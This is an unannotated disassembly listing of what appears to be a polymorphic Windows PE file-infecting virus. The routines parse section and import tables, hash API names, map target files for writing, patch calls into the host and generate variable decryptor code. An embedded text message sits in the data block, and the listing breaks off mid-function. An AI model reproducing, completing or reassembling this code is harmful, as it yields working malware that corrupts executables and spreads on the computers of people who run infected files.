dd 8D004036h, 40384D8Dh, 6ACE2B00h, 53565100h, 360C95FFh
dd 0F8830040h, 912F7E00h, 0B58DFE8Bh, 40364Eh, 0AEF20DB0h
dd 0E8601075h, 0FFFFFAF8h, 0E3177261h, 1778D09h, 0CF8BEAEBh
dd 0BD8DCE2Bh, 40364Eh, 0F787A4F3h, 0FF53B9EBh, 40360095h
dd 77BD8000h, 1004015h, 30682A74h, 0FF000075h, 4035BC95h
dd 4DBD8000h, 4038h, 85C71174h, 401D69h, 0
dd 384D85C6h, 0E9000040h, 0FFFFFE56h, 158085C7h, 40h, 0C25D8000h
dd 0A0D0004h, 6F6E204Fh, 6F206E6Fh, 696C2066h, 20216566h
dd 6974204Fh, 7420656Dh, 6563206Fh, 7262656Ch, 21657461h
dd 20200A0Dh, 4F202020h, 6D757320h, 2072656Dh, 64726167h
dd 0D216E65h, 6C65520Ah, 6C746E65h, 6C737365h, 61682079h
dd 20797070h, 20646E61h, 65707865h, 6E617463h, 73202C74h
dd 646E6174h, 3A676E69h, 0A0D2D20h, 63746157h, 676E6968h
dd 6C6C6120h, 79616420h, 646E6120h, 67696E20h, 202C7468h
dd 20726F66h, 65697266h, 2073646Eh, 61772049h, 0D3A7469h
dd 6568570Ah, 61206572h, 79206572h, 202C756Fh, 65697266h
dd 3F73646Eh, 6D6F4320h, 49202165h, 73692074h, 6D697420h
dd 49202165h, 20732774h, 6574616Ch, 290A0D21h, 0E510A614h
dd 0ED27B1FAh, 5C4FD479h, 4C26CCCh, 4830C784h, 57403752h
dd 523AAB59h, 6AD8B8B3h, 13606EF9h, 4710A614h, 7E6299ADh
dd 1A73C1h, 12h dup(0)
dd 8F000000h
db 98h, 68h, 0C7h
; =============== S U B R O U T I N E =======================================
sub_31008523 proc near ; CODE XREF: sub_3100856A:loc_310085C7�p
; sub_3100862A+7�p ...
arg_0 = dword ptr 4
pusha
and dword ptr [ebp+4039A6h], 0
and dword ptr [ebp+4039AAh], 0
movzx eax, word ptr [ebx+14h]
lea edx, [ebx+18h]
movzx ecx, word ptr [ebx+6]
add edx, eax
loc_3100853F: ; CODE XREF: sub_31008523+41�j
mov eax, [esp+20h+arg_0]
sub eax, [edx+0Ch]
jb short loc_31008561
cmp eax, [edx+8]
jnb short loc_31008561
mov eax, [edx+14h]
sub eax, [edx+0Ch]
mov [ebp+4039A6h], edx
mov [ebp+4039AAh], eax
jmp short loc_31008566
; ---------------------------------------------------------------------------
loc_31008561: ; CODE XREF: sub_31008523+23�j
; sub_31008523+28�j
add edx, 28h
loop loc_3100853F
loc_31008566: ; CODE XREF: sub_31008523+3C�j
popa
retn 4
sub_31008523 endp
; =============== S U B R O U T I N E =======================================
sub_3100856A proc near ; CODE XREF: UPX2:31008896�p
; UPX2:310088BC�p
mov [ebp+4022F7h], al
call sub_310085D9
push 20h
lea eax, [ebp+402224h]
pop ecx
loc_31008581: ; CODE XREF: sub_3100856A+1E�j
cmp [eax], ebx
jz short loc_31008591
add eax, 4
loop loc_31008581
inc dword ptr [ebp+40398Eh]
retn
; ---------------------------------------------------------------------------
loc_31008591: ; CODE XREF: sub_3100856A+19�j
neg ecx
add ecx, [ebp+4022F7h]
jecxz short loc_310085AB
loc_3100859B: ; CODE XREF: sub_3100856A+39�j
push dword ptr [eax-4]
pop dword ptr [eax]
sub eax, 4
loop loc_3100859B
mov [ebp+402224h], ebx
loc_310085AB: ; CODE XREF: sub_3100856A+2F�j
; sub_310085D9+34�j
cmp dword ptr [edx], 0
jz short loc_310085B5
sub esi, [edx]
add esi, [edx+10h]
loc_310085B5: ; CODE XREF: sub_3100856A+44�j
lea ecx, [esi-4]
pop eax
pop ebx
pop esi
cmp dword ptr [edx], 0
jz short loc_310085C4
push dword ptr [edx]
jmp short loc_310085C7
; ---------------------------------------------------------------------------
loc_310085C4: ; CODE XREF: sub_3100856A+54�j
push dword ptr [edx+10h]
loc_310085C7: ; CODE XREF: sub_3100856A+58�j
call sub_31008523
sub ecx, esi
sub ecx, [ebp+4039AAh]
pop eax
add ecx, [ebx+34h]
retn
sub_3100856A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_310085D9 proc near ; CODE XREF: sub_3100856A+6�p
pop dword ptr [ebp+403992h]
mov dword ptr [ebp+40398Eh], 0
call sub_3100862A
mov eax, [ebp+40398Eh]
call sub_31007D6E
call sub_31008616
cmp dword ptr [ebp+40398Eh], 0
jnz short loc_3100860F
mov [ebp+4022A0h], ebx
jmp short loc_310085AB
; ---------------------------------------------------------------------------
loc_3100860F: ; CODE XREF: sub_310085D9+2C�j
dec dword ptr [ebp+40398Eh]
retn
sub_310085D9 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_31008616 proc near ; CODE XREF: sub_310085D9+20�p
pop dword ptr [ebp+403992h]
mov [ebp+40398Eh], edx
call sub_3100862A
xor ecx, ecx
retn
sub_31008616 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3100862A proc near ; CODE XREF: sub_310085D9+10�p
; sub_31008616+C�p ...
var_C = dword ptr -0Ch
var_4 = dword ptr -4
mov edx, [ebx+80h]
push edx
call sub_31008523
add edx, [ebp+4039AAh]
add edx, esi
loc_3100863E: ; CODE XREF: sub_3100862A+120�j
cmp dword ptr [edx+0Ch], 0
jz locret_3100874F
cmp dword ptr [edx+10h], 0
jz locret_3100874F
mov eax, [edx+0Ch]
push eax
call sub_31008523
add eax, [ebp+4039AAh]
add eax, esi
push eax
loc_31008664: ; CODE XREF: sub_3100862A+47�j
mov cl, [eax]
cmp cl, 0
jz short loc_31008684
cmp cl, 2Eh
jz short loc_31008673
loc_31008670: ; CODE XREF: sub_3100862A+58�j
inc eax
jmp short loc_31008664
; ---------------------------------------------------------------------------
loc_31008673: ; CODE XREF: sub_3100862A+44�j
mov ecx, [eax+1]
and ecx, 0DFDFDFDFh
cmp ecx, 4C4C44h
jnz short loc_31008670
loc_31008684: ; CODE XREF: sub_3100862A+3F�j
pop ecx
sub ecx, eax
cmp ecx, 0FFFFFFFAh
jg loc_31008747
cmp word ptr [eax-2], 3233h
jnz loc_31008747
push esi
cmp dword ptr [edx], 0
jnz short loc_310086A7
mov ecx, [edx+10h]
jmp short loc_310086A9
; ---------------------------------------------------------------------------
loc_310086A7: ; CODE XREF: sub_3100862A+76�j
mov ecx, [edx]
loc_310086A9: ; CODE XREF: sub_3100862A+7B�j
add esi, ecx
push ecx
call sub_31008523
add esi, [ebp+4039AAh]
loc_310086B7: ; CODE XREF: sub_3100862A+90�j
; sub_3100862A+117�j
lodsd
test eax, eax
js short loc_310086B7
jz loc_31008746
push dword ptr [ebp+4039AAh]
push eax
call sub_31008523
add eax, [ebp+4039AAh]
pop dword ptr [ebp+4039AAh]
add eax, [esp+4+var_4]
push ebx
add eax, 2
xor ebx, ebx
loc_310086E3: ; CODE XREF: sub_3100862A+CE�j
movzx ecx, byte ptr [eax]
jecxz short loc_310086FA
or cl, 20h
push ebx
shl [esp+0Ch+var_C], 4
sub [esp+0Ch+var_C], ebx
sub [esp+0Ch+var_C], ecx
pop ebx
inc eax
jmp short loc_310086E3
; ---------------------------------------------------------------------------
loc_310086FA: ; CODE XREF: sub_3100862A+BC�j
cmp ebx, 0DDBBD70Fh
jz short loc_31008740
cmp ebx, 0DB6E45A8h
jz short loc_31008740
cmp ebx, 0FFA13B59h
jz short loc_31008740
cmp ebx, 0ACB522D6h
jz short loc_31008740
cmp ebx, 0F358E993h
jz short loc_31008740
cmp ebx, 0F358E97Dh
jz short loc_31008740
cmp ebx, 0E1253F46h
jz short loc_31008740
cmp ebx, 0E1253F30h
jz short loc_31008740
call dword ptr [ebp+403992h]
loc_31008740: ; CODE XREF: sub_3100862A+D6�j
; sub_3100862A+DE�j ...
pop ebx
jmp loc_310086B7
; ---------------------------------------------------------------------------
loc_31008746: ; CODE XREF: sub_3100862A+92�j
pop esi
loc_31008747: ; CODE XREF: sub_3100862A+60�j
; sub_3100862A+6C�j
add edx, 14h
jmp loc_3100863E
; ---------------------------------------------------------------------------
locret_3100874F: ; CODE XREF: sub_3100862A+18�j
; sub_3100862A+22�j
retn
sub_3100862A endp
; ---------------------------------------------------------------------------
db 3
; =============== S U B R O U T I N E =======================================
sub_31008751 proc near ; CODE XREF: UPX2:3100888F�p
; UPX2:310088B5�p
push 4
pop eax
call sub_31007D6E
mov [ebp+4024D1h], dl
mov ax, 1831h
add ah, dl
shl ah, 3
add ah, dl
stosw
push 6
pop eax
call sub_31007D6E
add edx, 8
xchg edx, ecx
loc_31008779: ; CODE XREF: sub_31008751:loc_310087B8�j
push 5
pop eax
call sub_31007D6E
cmp dl, 3
jnb short loc_31008791
mov al, 50h
add al, [ebp+4024D1h]
stosb
jmp short loc_310087B8
; ---------------------------------------------------------------------------
loc_31008791: ; CODE XREF: sub_31008751+33�j
push 68h
pop eax
stosb
cmp dl, 3
jnz short loc_310087B2
mov al, 11h
call sub_31007D6E
mov eax, 1
loc_310087A6: ; CODE XREF: sub_31008751+5D�j
test dl, dl
jz short loc_310087B7
shl eax, 1
dec dl
jmp short loc_310087A6
; ---------------------------------------------------------------------------
jmp short loc_310087B7
; ---------------------------------------------------------------------------
loc_310087B2: ; CODE XREF: sub_31008751+47�j
mov eax, 80000000h
loc_310087B7: ; CODE XREF: sub_31008751+57�j
; sub_31008751+5F�j
stosd
loc_310087B8: ; CODE XREF: sub_31008751+3E�j
loop loc_31008779
retn
sub_31008751 endp
; ---------------------------------------------------------------------------
loc_310087BB: ; CODE XREF: sub_31009215+112�p
lea edi, [ebp+40343Ch]
test dword ptr [ebp+403431h], 80000000h
jz short loc_310087D0
mov al, 60h
stosb
loc_310087D0: ; CODE XREF: UPX2:310087CB�j
test dword ptr [ebp+403431h], 1000003h
jz loc_310088D6
; ---------------------------------------------------------------------------
db 0B8h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
call near ptr 0EE8A3394h
xchg eax, esi
cmp [eax+0], eax
mov al, 0E8h
stosb
stosd
test dword ptr [ebp+403431h], 1000000h
mov [ebp+40399Ah], edi
jz short loc_3100884E
test dword ptr [ebp+403431h], 2000000h
mov eax, 36FF6467h
jnz short loc_31008819
mov eax, 2E8B6467h
loc_31008819: ; CODE XREF: UPX2:31008812�j
stosd
mov ax, 0
stosw
jz short loc_31008825
mov al, 5Dh
stosb
loc_31008825: ; CODE XREF: UPX2:31008820�j
test dword ptr [ebp+403431h], 8000000h
mov eax, 86D8Dh
jnz short loc_3100884C
test dword ptr [ebp+403431h], 4000000h
mov eax, 8C583h
jz short loc_3100884C
mov eax, 0F8ED83h
loc_3100884C: ; CODE XREF: UPX2:31008834�j
; UPX2:31008845�j
stosd
dec edi
loc_3100884E: ; CODE XREF: UPX2:31008801�j
test dword ptr [ebp+403431h], 3
jz short loc_3100885E
mov al, 0E9h
stosb
stosd
loc_3100885E: ; CODE XREF: UPX2:31008858�j
mov eax, [ebp+403996h]
mov ecx, edi
sub ecx, eax
mov [eax-4], ecx
test dword ptr [ebp+403431h], 3
jz short loc_310088D6
mov eax, 36FF6467h
mov [ebp+40399Eh], edi
stosd
mov eax, 64670000h
stosd
mov eax, 2689h
stosd
call sub_31008751
mov al, 20h
call sub_3100856A
jecxz short loc_310088D6
mov ax, 15FFh
stosw
xchg eax, ecx
stosd
mov edx, [ebp+403431h]
not edx
test edx, 3
jnz short loc_310088C9
call sub_31008751
mov al, 1Fh
call sub_3100856A
mov ax, 15FFh
stosw
xchg eax, ecx
stosd
loc_310088C9: ; CODE XREF: UPX2:310088B3�j
mov ecx, edi
mov eax, [ebp+40399Eh]
sub ecx, eax
mov [eax-4], ecx
loc_310088D6: ; CODE XREF: UPX2:310087DA�j
; UPX2:31008875�j ...
test dword ptr [ebp+403431h], 4
jz short loc_310088F4
mov eax, 0C8FEC029h
stosd
mov eax, 474C008h
stosd
mov eax, 67EBF875h
stosd
loc_310088F4: ; CODE XREF: UPX2:310088E0�j
test dword ptr [ebp+403431h], 8
jnz short loc_3100894A
cmp byte ptr [ebp+40342Fh], 0
jz short loc_3100894A
mov eax, 0C9291829h
or ah, [ebp+40342Bh]
shl ah, 3
or ah, [ebp+40342Bh]
stosd
mov al, 0B1h
stosb
mov al, [ebp+40342Fh]
stosb
mov al, 40h
or al, [ebp+40342Bh]
stosb
mov ax, 0FDE2h
test dword ptr [ebp+403431h], 10h
jz short loc_31008948
mov al, 49h
stosb
mov ax, 0FC75h
loc_31008948: ; CODE XREF: UPX2:3100893F�j
stosw
loc_3100894A: ; CODE XREF: UPX2:310088FE�j
; UPX2:31008907�j
mov al, 0E8h
stosb
xor eax, eax
stosd
mov [ebp+403982h], edi
test dword ptr [ebp+403431h], 20h
jnz short loc_3100896B
mov al, 58h
or al, [ebp+403429h]
stosb
loc_3100896B: ; CODE XREF: UPX2:31008960�j
mov ax, 0C081h
test dword ptr [ebp+403431h], 40h
jz short loc_3100897E
add ah, 28h
loc_3100897E: ; CODE XREF: UPX2:31008979�j
or ah, [ebp+403429h]
stosw
mov [ebp+403986h], edi
stosd
test dword ptr [ebp+403431h], 40000000h
jnz short loc_310089A2
mov al, 50h
add al, [ebp+403429h]
stosb
loc_310089A2: ; CODE XREF: UPX2:31008997�j
test dword ptr [ebp+403431h], 80h
jnz short loc_310089B9
mov al, 0B8h
or al, [ebp+40342Ah]
stosb
jmp short loc_310089F6
; ---------------------------------------------------------------------------
loc_310089B9: ; CODE XREF: UPX2:310089AC�j
mov ax, 1831h
test dword ptr [ebp+403431h], 100h
jz short loc_310089CB
mov al, 29h
loc_310089CB: ; CODE XREF: UPX2:310089C7�j
or ah, [ebp+40342Ah]
shl ah, 3
or ah, [ebp+40342Ah]
stosw
mov ax, 0F081h
test dword ptr [ebp+403431h], 200h
jnz short loc_310089EE
mov ah, 0C8h
loc_310089EE: ; CODE XREF: UPX2:310089EA�j
or ah, [ebp+40342Ah]
stosw
loc_310089F6: ; CODE XREF: UPX2:310089B7�j
mov [ebp+4039A2h], edi
mov eax, 243Ch
stosd
test dword ptr [ebp+403431h], 8
jz short loc_31008A7A
test dword ptr [ebp+403431h], 400h
jnz short loc_31008A25
mov al, 0B8h
or al, [ebp+40342Bh]
stosb
jmp short loc_31008A72
; ---------------------------------------------------------------------------
loc_31008A25: ; CODE XREF: UPX2:31008A18�j
test dword ptr [ebp+403431h], 800h
jnz short loc_31008A42
mov ax, 0E083h
or ah, [ebp+40342Bh]
stosw
xor eax, eax
stosb
jmp short loc_31008A57
; ---------------------------------------------------------------------------
loc_31008A42: ; CODE XREF: UPX2:31008A2F�j
mov ax, 1829h
or ah, [ebp+40342Bh]
shl ah, 3
or ah, [ebp+40342Bh]
stosw
loc_31008A57: ; CODE XREF: UPX2:31008A40�j
test dword ptr [ebp+403431h], 1000h
mov ax, 0C081h
jz short loc_31008A6A
add ah, 8
loc_31008A6A: ; CODE XREF: UPX2:31008A65�j
or ah, [ebp+40342Bh]
stosw
loc_31008A72: ; CODE XREF: UPX2:31008A23�j
movzx eax, byte ptr [ebp+40342Fh]
stosd
loc_31008A7A: ; CODE XREF: UPX2:31008A0C�j
test dword ptr [ebp+403431h], 40000000h
jz short loc_31008A8F
mov al, 50h
add al, [ebp+403429h]
stosb
loc_31008A8F: ; CODE XREF: UPX2:31008A84�j
test dword ptr [ebp+403431h], 2000h
mov al, 86h
jnz short loc_31008A9F
add al, 4
loc_31008A9F: ; CODE XREF: UPX2:31008A9B�j
lea ecx, [edi-2]
mov ah, [ebp+403429h]
mov [ebp+40398Ah], ecx
stosw
cmp ah, 5
jnz short loc_31008ABC
mov al, 0
or byte ptr [edi-1], 40h
stosb
loc_31008ABC: ; CODE XREF: UPX2:31008AB3�j
test dword ptr [ebp+403431h], 4000h
mov ax, 3166h
jnz short loc_31008ACE
mov ah, 29h
loc_31008ACE: ; CODE XREF: UPX2:31008ACA�j
stosw
mov al, 18h
or al, [ebp+40342Bh]
shl al, 3
stosb
mov al, 88h
test dword ptr [ebp+403431h], 8000h
jnz short loc_31008AEC
mov al, 86h
loc_31008AEC: ; CODE XREF: UPX2:31008AE8�j
mov ah, [ebp+403429h]
stosw
cmp ah, 5
jnz short loc_31008B00
mov al, 0
or byte ptr [edi-1], 40h
stosb
loc_31008B00: ; CODE XREF: UPX2:31008AF7�j
test dword ptr [ebp+403431h], 10000h
jnz short loc_31008B17
mov al, 40h
or al, [ebp+403429h]
stosb
jmp short loc_31008B26
; ---------------------------------------------------------------------------
loc_31008B17: ; CODE XREF: UPX2:31008B0A�j
mov ax, 0C083h
or ah, [ebp+403429h]
stosw
mov al, 1
stosb
loc_31008B26: ; CODE XREF: UPX2:31008B15�j
test dword ptr [ebp+403431h], 20000h
jnz short loc_31008B61
test dword ptr [ebp+403431h], 40000h
jnz short loc_31008B58
mov al, 0C0h
or al, [ebp+40342Bh]
mov ah, [ebp+403430h]
shl eax, 10h
mov ax, 8166h
stosd
mov al, 0
jmp short loc_31008B60
; ---------------------------------------------------------------------------
loc_31008B58: ; CODE XREF: UPX2:31008B3C�j
mov al, 40h
or al, [ebp+40342Bh]
loc_31008B60: ; CODE XREF: UPX2:31008B56�j
stosb
loc_31008B61: ; CODE XREF: UPX2:31008B30�j
test dword ptr [ebp+403431h], 80000h
jnz short loc_31008B7D
mov ax, 0E883h
or ah, [ebp+40342Ah]
stosw
mov al, 1
jmp short loc_31008B85
; ---------------------------------------------------------------------------
loc_31008B7D: ; CODE XREF: UPX2:31008B6B�j
mov al, 48h
or al, [ebp+40342Ah]
loc_31008B85: ; CODE XREF: UPX2:31008B7B�j
stosb
test dword ptr [ebp+403431h], 100000h
mov cl, 75h
jnz short loc_31008BB9
mov ax, 0F883h
or ah, [ebp+40342Ah]
stosw
xor eax, eax
stosb
sub [ebp+40398Ah], edi
test dword ptr [ebp+403431h], 200000h
jnz short loc_31008BD4
mov cl, 77h
jmp short loc_31008BD4
; ---------------------------------------------------------------------------
loc_31008BB9: ; CODE XREF: UPX2:31008B92�j
mov ax, 1809h
or ah, [ebp+40342Ah]
shl ah, 3
or ah, [ebp+40342Ah]
stosw
sub [ebp+40398Ah], edi
loc_31008BD4: ; CODE XREF: UPX2:31008BB3�j
; UPX2:31008BB7�j
mov al, cl
mov ah, [ebp+40398Ah]
stosw
mov al, 58h
add al, [ebp+403429h]
stosb
test dword ptr [ebp+403431h], 1000003h
jz loc_31008C7E
mov eax, 268B6467h
mov ecx, [ebp+403431h]
xor ecx, 2000000h
test ecx, 3000000h
jnz short loc_31008C15
mov eax, 2E876467h
loc_31008C15: ; CODE XREF: UPX2:31008C0E�j
stosd
mov eax, 0
stosw
jnz short loc_31008C25
mov ax, 0E58Bh
stosw
loc_31008C25: ; CODE XREF: UPX2:31008C1D�j
mov eax, 68F6764h
stosd
xor eax, eax
stosw
test dword ptr [ebp+403431h], 1000000h
jnz short loc_31008C7B
test dword ptr [ebp+403431h], 8000000h
jz short loc_31008C6D
mov ax, 6C8Dh
test dword ptr [ebp+403431h], 2000000h
setnz cl
or ah, cl
stosw
test cl, cl
jnz short loc_31008C68
mov ax, 424h
stosw
jmp short loc_31008C7B
; ---------------------------------------------------------------------------
loc_31008C68: ; CODE XREF: UPX2:31008C5E�j
mov al, 8
stosb
jmp short loc_31008C7B
; ---------------------------------------------------------------------------
loc_31008C6D: ; CODE XREF: UPX2:31008C45�j
mov ax, 5D58h
add al, [ebp+40342Bh]
stosw
jmp short loc_31008C7E
; ---------------------------------------------------------------------------
loc_31008C7B: ; CODE XREF: UPX2:31008C39�j
; UPX2:31008C66�j ...
mov al, 0C9h
stosb
loc_31008C7E: ; CODE XREF: UPX2:31008BF1�j
; UPX2:31008C79�j
test dword ptr [ebp+403431h], 80000000h
jz short loc_31008CAA
mov al, 7
sub al, [ebp+403429h]
shl eax, 1Ah
or eax, 240889h
add ah, [ebp+403429h]
shl ah, 3
add ah, 4
stosd
mov al, 61h
stosb
loc_31008CAA: ; CODE XREF: UPX2:31008C88�j
mov ax, 0E0FFh
or ah, [ebp+403429h]
stosw
test dword ptr [ebp+403431h], 20h
jz short loc_31008D15
test dword ptr [ebp+403431h], 20000000h
jz short loc_31008CDB
loc_31008CCE: ; CODE XREF: UPX2:31008CD9�j
test edi, 3
jz short loc_31008CDB
mov al, 90h
stosb
jmp short loc_31008CCE
; ---------------------------------------------------------------------------
loc_31008CDB: ; CODE XREF: UPX2:31008CCC�j
; UPX2:31008CD4�j
mov eax, edi
mov ecx, [ebp+403982h]
sub eax, ecx
mov [ecx-4], eax
mov al, 58h
or al, [ebp+403429h]
stosb
test dword ptr [ebp+403431h], 400000h
jz short loc_31008D09
mov ax, 0C350h
or al, [ebp+403429h]
jmp short loc_31008D13
; ---------------------------------------------------------------------------
loc_31008D09: ; CODE XREF: UPX2:31008CFB�j
mov ax, 0E0FFh
or ah, [ebp+403429h]
loc_31008D13: ; CODE XREF: UPX2:31008D07�j
stosw
loc_31008D15: ; CODE XREF: UPX2:31008CC0�j
test dword ptr [ebp+403431h], 1000003h
jz short loc_31008D94
test dword ptr [ebp+403431h], 20000000h
jz short loc_31008D3A
loc_31008D2D: ; CODE XREF: UPX2:31008D38�j
test edi, 3
jz short loc_31008D3A
mov al, 90h
stosb
jmp short loc_31008D2D
; ---------------------------------------------------------------------------
loc_31008D3A: ; CODE XREF: UPX2:31008D2B�j
; UPX2:31008D33�j
mov ecx, edi
mov eax, [ebp+40399Ah]
sub ecx, eax
mov [eax-4], ecx
xor ecx, ecx
test dword ptr [ebp+403431h], 800000h
jnz short loc_31008D63
lea eax, [ebp+403429h]
loc_31008D5B: ; CODE XREF: UPX2:31008D61�j
mov cl, [eax]
inc eax
cmp cl, 3
jnb short loc_31008D5B
loc_31008D63: ; CODE XREF: UPX2:31008D53�j
lea eax, ds:102444h[ecx*8]
shl eax, 8
mov al, 8Bh
stosd
jecxz short loc_31008D78
mov ax, 0C031h
stosw
loc_31008D78: ; CODE XREF: UPX2:31008D70�j
mov ax, 808Fh
push 0B8h
add ah, cl
stosw
pop eax
stosd
test ecx, ecx
jnz short loc_31008D91
mov ax, 0C031h
stosw
loc_31008D91: ; CODE XREF: UPX2:31008D89�j
mov al, 0C3h
stosb
loc_31008D94: ; CODE XREF: UPX2:31008D1F�j
lea eax, [ebp+40343Ch]
test dword ptr [ebp+403431h], 10000000h
jnz short loc_31008DAC
push edi
sub edi, eax
pop eax
jmp short loc_31008DC5
; ---------------------------------------------------------------------------
loc_31008DAC: ; CODE XREF: UPX2:31008DA4�j
mov edx, [ebx+28h]
sub edi, eax
sub edx, eax
mov ecx, [ebp+4039A2h]
add [ebp+403982h], edx
add [ecx], edi
mov eax, [esp+4]
loc_31008DC5: ; CODE XREF: UPX2:31008DAA�j
mov [ebp+40106Dh], edi
mov edi, [ebp+403986h]
sub eax, [ebp+403982h]
test dword ptr [ebp+403431h], 40h
jz short loc_31008DE5
neg eax
loc_31008DE5: ; CODE XREF: UPX2:31008DE1�j
stosd
retn 4
; =============== S U B R O U T I N E =======================================
sub_31008DE9 proc near ; CODE XREF: sub_31009215+2A8�p
push esi
push edi
cmp dword ptr [ebp+4039AEh], 0
jz loc_31008FD1
call near ptr loc_31008E09+1
dec ebx
inc ebp
push edx
dec esi
inc ebp
dec esp
xor esi, [edx]
db 2Eh
inc esp
dec esp
dec esp
loc_31008E09: ; CODE XREF: sub_31008DE9+F�p
add bh, bh
sub_31008DE9 endp ; sp-analysis failed
xchg eax, ebp
mov ds:85890040h, dh
mov esi, 53004039h
mov ebx, [eax+3Ch]
add ebx, eax
push dword ptr [ebx+28h]
mov eax, [ebx+34h]
call sub_31008523
mov edx, [ebp+4039A6h]
pop ebx
add eax, [edx+0Ch]
mov [ebp+4039C2h], eax
add eax, [edx+8]
mov [ebp+4039C6h], eax
mov esi, [ebx+28h]
push dword ptr [ebx+80h]
call sub_31008523
mov edi, [ebp+4039A6h]
push esi
call sub_31008523
mov edx, [ebp+4039A6h]
mov ecx, [edx+8]
add ecx, [edx+0Ch]
sub ecx, esi
sub ecx, 5
js loc_31008FD1
jz loc_31008FD1
add esi, [ebp+4039AAh]
add esi, [ebp+403972h]
; START OF FUNCTION CHUNK FOR sub_31008FA2
loc_31008E83: ; CODE XREF: sub_31008FA2+29�j
lodsb
cmp al, 0E8h
jnz loc_31008F2E
lea eax, [esi+4]
sub eax, [ebp+403972h]
add eax, [esi]
push eax
call sub_31008523
cmp dword ptr [ebp+4039A6h], 0
jnz short loc_31008EB1
cmp eax, [edi+0Ch]
jnb loc_31008FCA
jmp short loc_31008EBD
; ---------------------------------------------------------------------------
loc_31008EB1: ; CODE XREF: sub_31008FA2-FE�j
cmp [ebp+4039A6h], edx
jnz loc_31008FCA
loc_31008EBD: ; CODE XREF: sub_31008FA2-F3�j
add eax, [ebp+403972h]
cmp word ptr [eax], 25FFh
jnz loc_31008FCA
mov eax, [eax+2]
sub eax, [ebx+34h]
push eax
call sub_31008523
cmp [ebp+4039A6h], edi
jnz loc_31008FCA
add eax, [ebp+4039AAh]
add eax, [ebp+403972h]
mov eax, [eax]
sub eax, [edi+0Ch]
jb loc_31008FCA
cmp eax, [edi+8]
jnb loc_31008FCA
loc_31008F06: ; CODE XREF: sub_31008FA2+22�j
add eax, 2
add eax, [edi+14h]
add eax, [ebp+403972h]
push edx
push eax
push dword ptr [ebp+4039BEh]
call dword ptr [ebp+403548h]
pop edx
test eax, eax
jnz loc_31008FE0
jmp loc_31008FCA
; ---------------------------------------------------------------------------
loc_31008F2E: ; CODE XREF: sub_31008FA2-11C�j
cmp al, 0FFh
jnz loc_31008FCA
cmp byte ptr [esi], 15h
jnz loc_31008FCA
mov eax, [esi+1]
sub eax, [ebx+34h]
push eax
call sub_31008523
cmp [ebp+4039A6h], edi
jnz short loc_31008FCA
add eax, [ebp+4039AAh]
add eax, [ebp+403972h]
mov [ebp+4039CAh], eax
mov eax, [eax]
cmp eax, [ebp+4039C2h]
jb short loc_31008F77
cmp eax, [ebp+4039C6h]
jb short loc_31008FE0
loc_31008F77: ; CODE XREF: sub_31008FA2-35�j
cmp eax, 70000000h
jb short loc_31008FB5
call sub_31008FA2
lea ecx, [esi-4]
mov eax, ecx
sub eax, [edx]
add eax, [edx+10h]
cmp eax, [ebp+4039CAh]
jnz short locret_31008FA1
add esp, 10h
push dword ptr [ecx]
pop [esp-0Ch+arg_24]
popa
jmp short loc_31008FBC
; ---------------------------------------------------------------------------
locret_31008FA1: ; CODE XREF: sub_31008FA2-F�j
retn
; END OF FUNCTION CHUNK FOR sub_31008FA2
; =============== S U B R O U T I N E =======================================
sub_31008FA2 proc near ; CODE XREF: sub_31008FA2-24�p
var_8 = dword ptr -8
arg_0 = dword ptr 4
arg_24 = dword ptr 28h
; FUNCTION CHUNK AT 31008E83 SIZE 0000011F BYTES
pop dword ptr [ebp+403992h]
pusha
mov esi, [ebp+403972h]
call sub_3100862A
popa
loc_31008FB5: ; CODE XREF: sub_31008FA2-26�j
test eax, 80000000h
jnz short loc_31008FCA
loc_31008FBC: ; CODE XREF: sub_31008FA2-3�j
sub eax, [edi+0Ch]
jb short loc_31008FCA
cmp eax, [edi+8]
jb loc_31008F06
loc_31008FCA: ; CODE XREF: sub_31008FA2-F9�j
; sub_31008FA2-EB�j ...
dec ecx
jnz loc_31008E83
loc_31008FD1: ; CODE XREF: sub_31008DE9+9�j
; UPX2:31008E6B�j ...
mov edi, [esp-4+arg_0]
and dword ptr [edi+2431h], 7FFFFFFFh
jmp short loc_3100901C
; ---------------------------------------------------------------------------
loc_31008FE0: ; CODE XREF: sub_31008FA2-7F�j
; sub_31008FA2-2D�j
or dword ptr [edx+24h], 0E0000060h
dec esi
xor eax, eax
mov ecx, [esp+8+var_8]
xchg eax, [ebp+4039AEh]
lea edi, [ecx+2435h]
add eax, [ebp+403972h]
movsw
movsd
dec esi
sub eax, esi
add eax, [edx+14h]
sub eax, [edx+0Ch]
mov byte ptr [esi-5], 0E8h
mov dword ptr [ecx+52h], 5
mov [esi-4], eax
loc_3100901C: ; CODE XREF: sub_31008FA2+3C�j
pop edi
pop esi
retn
sub_31008FA2 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3100901F proc near ; CODE XREF: UPX2:310091ED�p
; sub_31009215+127�p
lea esi, [ebp+40384Eh]
push esi
call dword ptr [ebp+40357Ch]
cmp eax, 0FFFFFFFFh
jz locret_310090F0
mov [ebp+403952h], eax
push 0
push esi
call dword ptr [ebp+4035B4h]
test eax, eax
jz locret_310090F0
sub eax, eax
push eax
push eax
push 3
push eax
push 1
push 0C0000000h
push esi
call dword ptr [ebp+40355Ch]
cmp eax, 0FFFFFFFFh
jz loc_310095A8
mov [ebp+403956h], eax
lea ecx, [ebp+40395Ah]
lea edx, [ebp+403962h]
push ecx
push edx
push 0
push eax
call dword ptr [ebp+403584h]
cmp eax, 0FFFFFFFFh
jz loc_3100959C
push 0
push dword ptr [ebp+403956h]
call dword ptr [ebp+403580h]
cmp eax, 0FFFFFFFFh
jz loc_3100959C
mov [ebp+40396Ah], eax
xor ecx, ecx
add eax, ebx
push ecx
push eax
push ecx
push 4
push ecx
push dword ptr [ebp+403956h]
call dword ptr [ebp+403560h]
test eax, eax
jz loc_3100959C
xor ecx, ecx
mov [ebp+40396Eh], eax
push ecx
push ecx
push ecx
push 0F001Fh
push eax
call dword ptr [ebp+4035A0h]
test eax, eax
jz loc_31009574
mov [ebp+403972h], eax
locret_310090F0: ; CODE XREF: sub_3100901F+10�j
; sub_3100901F+27�j ...
retn
sub_3100901F endp
; =============== S U B R O U T I N E =======================================
sub_310090F1 proc near ; CODE XREF: sub_31009215+117�p
; sub_31009215+223�p
mov eax, 69CDh
mov ecx, [ebx+38h]
test dword ptr [ebp+403431h], 10000000h
jnz short loc_3100910B
